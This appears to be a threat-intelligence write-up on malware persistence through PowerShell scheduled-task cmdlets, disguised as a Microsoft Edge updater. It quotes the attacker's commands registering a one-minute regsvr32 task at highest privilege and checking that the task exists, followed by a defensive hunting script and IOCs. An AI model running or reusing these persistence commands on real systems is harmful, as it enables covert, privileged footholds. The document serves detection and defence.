PowerShell Cmdlet Abuse for Persistence in Malware Attacks

While this persistence technique isn't rare, it's not very common to see attackers using these specific cmdlets. Cmdlet abuse refers to the misuse of built-in PowerShell commands (cmdlets) by attackers; here the ScheduledTasks module cmdlets were used to register a recurring task that reloads the payload.
In this instance, the task was disguised to appear as a Microsoft Edge update.
powershell "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'regsvr32' -Argument '/S /i:SYNC C:\Users\<USER>\AppData\Roaming\9secur32_5.drv') -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C51CED40-3F5F-4FAF-E44D-E40FBA838523}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Moreover, the adversary employed PowerShell to verify the existence of the scheduled task:
powershell -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\<USER>\AppData\Roaming\9secur32_5.drv' }) { exit 0 } else { exit 1 }"
As demonstrated, these cmdlets offer valuable opportunities for detection: a powershell.exe command line containing Register-ScheduledTask or New-ScheduledTaskAction, a task action that runs regsvr32 with an /i: argument pointing into a user's AppData folder, a one-minute repetition interval, a RunLevel of Highest, and a task name imitating the Microsoft Edge updater are all traits a defender can alert on.
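The following is an added hunting script, not code from the original post, that enumerates registered tasks on a host and flags those combining the traits described above. The LOLBin list, the AppData path pattern, the five-minute interval threshold and the assumption that a genuine Edge update task launches MicrosoftEdgeUpdate.exe are illustrative choices; run it from an elevated PowerShell session.

```powershell
# Added example (not from the original post): hunt for scheduled tasks whose action
# launches a LOLBin with a payload under a user profile, repeats on a short interval,
# runs with RunLevel Highest, or carries an Edge-update name but runs a non-Edge binary.
# Thresholds, patterns and the Edge binary name are assumptions for illustration.

$suspiciousExe   = @('regsvr32', 'regsvr32.exe', 'rundll32', 'rundll32.exe')
$userPathPattern = '(?i)\\Users\\[^\\]+\\AppData\\'
$maxIntervalMins = 5

$findings = foreach ($task in Get-ScheduledTask) {
    foreach ($action in $task.Actions) {
        # COM-handler actions have no Execute/Arguments; casting $null yields ''.
        $exe    = [System.IO.Path]::GetFileName([string]$action.Execute)
        $argStr = [string]$action.Arguments
        $reasons = @()
        if ($suspiciousExe -contains $exe.ToLower()) { $reasons += "LOLBin action ($exe)" }
        if ($argStr -match $userPathPattern)          { $reasons += 'payload under a user profile' }
        if ($argStr -match '(?i)/i:')                 { $reasons += 'regsvr32 /i: install argument' }
        foreach ($trig in $task.Triggers) {
            # Repetition.Interval is an ISO 8601 duration such as PT1M.
            $rep = [string]$trig.Repetition.Interval
            if ($rep -match '^PT(\d+)M$' -and [int]$Matches[1] -le $maxIntervalMins) {
                $reasons += "repeats every $($Matches[1]) minute(s)"
            }
        }
        if ($task.Principal.RunLevel -eq 'Highest') { $reasons += 'RunLevel Highest' }
        if ($task.TaskName -match '(?i)^MicrosoftEdgeUpdateTask' -and
            $exe -notmatch '(?i)^MicrosoftEdgeUpdate\.exe$') {
            $reasons += 'Edge-update task name but non-Edge binary'
        }
        # Report only when the LOLBin trait appears together with at least one other trait,
        # which keeps ordinary regsvr32/rundll32 maintenance tasks out of the results.
        if ($reasons.Count -ge 2 -and $reasons[0] -like 'LOLBin*') {
            [pscustomobject]@{
                TaskName  = $task.TaskName
                TaskPath  = $task.TaskPath
                Execute   = $action.Execute
                Arguments = $argStr
                Reasons   = ($reasons -join '; ')
            }
        }
    }
}

$findings | Format-List
```

The same traits map directly onto Task Scheduler operational log events (task registered) and process-creation telemetry for powershell.exe, so the logic can be ported to a SIEM query once it has been validated on a host.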
IOCs

Malicious File(s) (SHA256):
582ca9b2b5b8f8e5f79185f60a6893ec782527e464f037360678fc61e513dcd2
d2fbc247f3f5e8bec0f7a282b6ea1a0d650cb86de337a7bd8a4be292f9a7e959
06c1d2ea250d4c6453675091b1064154068c69ed6f01de7d00f5851d7ac66ba1
da32159b27065337a699264da4778b7c99f8fbb4f00617061b9a5b5397bd5973

Malicious IP(s):
93[.]185[.]97[.]211
66[.]94[.]121[.]207